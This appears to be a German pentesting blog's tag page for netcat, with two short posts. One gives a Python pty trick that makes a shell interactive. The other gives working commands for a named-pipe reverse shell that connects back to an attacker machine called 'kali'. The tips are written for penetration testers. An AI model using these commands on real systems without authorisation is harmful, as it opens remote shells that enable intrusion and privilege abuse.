• Über uns
    • Dominik Sauer
    • Patrick Sauer
  • Impressum / Datenschutzerklärung
InfoSec Blog

Patrick Sauer & Dominik Sauer

nc

Interaktive Reverse-Shell mit Netcat durch Python

16. November 2013 by Patrick Sauer Leave a Comment

Eine Reverse-Shell mit netcat ist leider nicht interaktiv. Somit sind Tools wie sudo, mysql, su usw. nicht oder nur eingeschränkt benutzbar. Sofern auf dem Zielrechner Python installiert ist, lässt sich innerhalb der Netcat-Session einfach ein Terminal simulieren: python -c ‚import pty; pty.spawn(„/bin/bash“)‘

Posted in: Pentesting Tagged: nc, netcat, Python

Remote-Shell mit Netcat ohne „-e“ exec

28. Oktober 2013 by Patrick Sauer Leave a Comment

Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe: kali# nc -nvlp 4444 host# mknod /tmp/pipe p host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die … [Read more…]

Posted in: Pentesting Tagged: kali, nc, netcat

Sprachen

  • Deutsch
    • English

Search

Categories

  • binsec
  • binsec.academy
  • binsec.tools
  • Informationssicherheit
  • IT-Forensik
  • IT-Sicherheit
  • Lehraufträge
  • Netzpolitik
  • PCI DSS
  • Pentest Collective
  • Pentesting
  • Presse
  • Regulatorik
  • Studium
  • Unkategorisiert
  • Vorlesung
    • HDA
    • THB
    • THM
  • Vorträge

Copyright © 2026 InfoSec Blog.

Omega WordPress Theme by ThemeHall

  • Deutsch
  • English (Englisch)